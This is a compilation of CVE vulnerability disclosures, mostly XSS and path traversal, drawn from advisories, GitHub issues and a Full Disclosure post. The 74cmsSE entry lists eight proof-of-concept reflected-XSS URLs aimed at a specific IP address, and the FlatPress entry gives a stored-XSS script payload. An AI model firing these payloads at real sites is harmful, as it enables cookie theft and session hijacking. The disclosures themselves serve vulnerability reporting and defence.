Jenkins Embeddable Build Status Plugin 2.0.3 and earlier allows specifying a `style` query parameter that is used to choose a different SVG image style without restricting possible values, resulting in a relative path traversal vulnerability that allows attackers without Overall/Read permission to specify paths to other SVG images on the Jenkins controller file system.

CVE-2022-34179: Jenkins Security Advisory 2022-06-22

Stored XSS and SQL injection vulnerability in MaxBoard could lead to occur Remote Code Execution, which could lead to information exposure and privilege escalation.

**KISA 인터넷 보호나라&KrCERT**

\[나주본원\] (58324) 전라남도 나주시 진흥길 9 한국인터넷진흥원 대표번호 : 1433-25(수신자 요금 부담)

\[서울청사\] (05717) 서울시 송파구 중대로 135 (가락동) IT벤처타워 \[해킹ㆍ스팸개인정보침해 신고 118\]

Copyright(C) 2021 KISA. All rights reserved.

CVE-2021-26636: KISA 인터넷 보호나라&KrCERT

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**FlatPress 1.2.1 - Stored XSS in the Blog Content**

A stored Cross Site Scripting (XSS) vulnerability exists in version 1.2.1 of the FlatPress application that allows for arbitrary execution of JavaScript commands.

**Steps to reproduce the vulnerability**

1.  Visit the FlatPress **Administration area**.
2.  Navigate to the **Entries** -> **Write Entry**.
3.  Enter any **Subject**.
4.  In the content area put the following payload:
    *   <script>alert(document.cookie)</script>

5.  Click the **Save&Continue** button.
6.  Stored XSS payload is triggered.

*   Also we can verify the stored XSS payload by navigating to the home page.

Discovered by Martin Kubecka, September 15 2021

Copy link

Member

** **azett** commented Oct 19, 2021**

Hi, thanks for reporting this.  
As legitimated site admin, it is okay to add custom HTML or JS to your page - the described behaviour is intended.  
Does your findings implicate a way to exploit this behaviour _without_ being logged in as site admin?  
Thanks and regards,  
Arvid

2 participants

CVE-2021-41432: Stored XSS in the Blog Content · Issue #88 · flatpressblog/flatpress

Cross Site Scripting (XSS) vulnerability in sourcecodester School File Management System 1.0 via the Firtstname parameter to the Update Account form in student_profile.php.

CVE-2021-29055

Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the keyword text field under the publish blog module.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-33113: XSS vulnerability stored in the publish blog module of Jfinal_cms V5.1.0 · Issue #39 · jflyfox/jfinal_cms

This advisory contains mitigations for Improper Access Control, Relative Path Traversal, and Cross-site Scripting vulnerabilities in the Elcomplus SmartICS web-based HMI.

Elcomplus SmartICS

In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability. 

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-34305

A vulnerability, which was classified as problematic, has been found in Alpine PhotoTile for Instagram Plugin 1.2.7.7. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:10:30 +0100  

\------------------------------------------------------------------------
Cross-Site Scripting in Alpine PhotoTile for Instagram WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Alpine PhotoTile
for Instagram WordPress Plugin. This issue allows an attacker to perform
a wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0010

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Alpine PhotoTile for Instagram
WordPress Plugin version 1.2.7.7.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_scripting\_in\_alpine\_phototile\_for\_instagram\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Cross-Site Scripting in Alpine PhotoTile for Instagram WordPress Plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20087: Cross-Site Scripting in Alpine PhotoTile for Instagram WordPress Plugin

A vulnerability was found in Gwolle Guestbook Plugin 1.7.4. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to basic cross site scripting. The attack may be initiated remotely.

Tag

#xss